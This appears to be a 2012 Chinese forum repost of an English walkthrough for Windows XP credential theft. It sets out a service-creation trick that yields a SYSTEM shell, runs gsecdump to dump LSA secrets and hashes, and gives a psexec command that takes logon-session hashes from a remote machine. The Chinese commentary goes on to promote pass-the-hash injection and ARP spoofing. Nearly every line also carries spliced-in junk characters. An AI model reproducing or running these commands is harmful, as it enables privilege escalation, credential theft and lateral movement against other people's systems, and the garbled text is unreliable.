o get a DOS Prompt as NT system:
% f, m% t) V [1 X2 W2 l; p
. X) P4 k4 ?/ P: J3 s, w& G" SC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
3 H' P( W. } |( O s" k; s. I4 W[SC] CreateService SUCCESS, n: M4 {) G8 B
8 D3 Q- ?6 ^' Z3 Y4 k5 SC:\>sc start shellcmdline) W! V, X# }2 H: r X5 f: c2 j
[SC] StartService FAILED 1053:7 G5 Z7 t2 C4 y5 }/ H! s1 j+ Q
- Z5 `4 t7 x9 ~$ {The service did not respond to the start or control request in a timely fashion.
% b( g$ Z6 b5 h8 m& p J
$ E7 }. g/ s9 r& `* W2 p( hC:\>sc delete shellcmdline/ F: h0 N K3 C) q4 N3 W
[SC] DeleteService SUCCESS; P' n4 }. J0 b& c( c2 S, W- W9 L* A
8 X; Q! `( q; j {7 U! t! I------------% Q2 Q0 S7 e6 `) T, M
5 c+ x4 j9 s' @% |+ \7 ^9 d& ]
Then in the new DOS window:
- U/ N# ^% B6 `7 [7 C8 O8 n! w' L* W( I; |
Microsoft Windows XP [Version 5.1.2600]
+ c0 M* T: e6 ?3 t, b( r3 E# B9 x(C) Copyright 1985-2001 Microsoft Corp.( [. Z/ g; K/ Q3 m- `
3 ~. O: A: O3 A8 W1 N5 b# o. s
C:\WINDOWS\system32>whoami
+ p @2 B) |; ^0 U8 U yNT AUTHORITY\SYSTEM
" _4 r w( O0 o+ Q
8 r$ w0 m8 G5 E6 P" ^3 JC:\WINDOWS\system32>gsecdump -h& L& ^! c6 Y2 ]
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se), H* G) l7 n+ l; ^" F' k( L3 M
usage: gsecdump [options]: S: ]- O8 q' N9 B2 l4 b
; ?5 S* f0 e# P0 D }4 X! ^# |options:
' W# |; e0 ^% W1 P! B-h [ --help ] show help
5 u t* {9 w: O+ k4 X% Y-a [ --dump_all ] dump all secrets: `; @- W) _# |& ? y# V2 L* B
-l [ --dump_lsa ] dump lsa secrets7 R' ~5 R, q/ T _7 J9 c
-w [ --dump_wireless ] dump microsoft wireless connections6 n% f; Z h5 ?; P* i( p
-u [ --dump_usedhashes ] dump hashes from active logon sessions, K6 w- c$ B' q4 v H
-s [ --dump_hashes ] dump hashes from SAM/AD- P' W+ }; u7 g, r, P0 _* Q
' N: x% D2 u0 M3 t- sAlthough I like to use: Q3 {' T& M/ e* ~) u) ?
3 G( o8 O, z, c0 X9 D$ X! H
PsExec v1.83 - Execute processes remotely
7 e1 d: F+ P2 w3 W& ]' gCopyright (C) 2001-2007 Mark Russinovich( x! B5 L# {/ O l' v G b8 i( U4 z
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
/ M" F% P' Y V$ D. F4 @' s6 l: ~1 N* {' A% P
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
9 H/ O$ N: U7 f
$ h/ o6 h' e9 R. W& gto get the hashes from active logon sessions of a remote system.
$ V; \; p5 d' \ K+ C. A3 G4 @# i8 h5 O; ]' K4 a6 _* B) s. y
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.: _; p. z3 m* v+ f4 d# i R5 V; O
" p9 M) Q H0 I2 L- V$ y
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 f4 v% v) ?' A原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
5 N8 r5 V! w. a
& G& h5 w1 c- [. N我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。7 R: {! L, e% r: f' a4 [
|
发表于 2012-11-6 21:09:29
收藏
支持
反对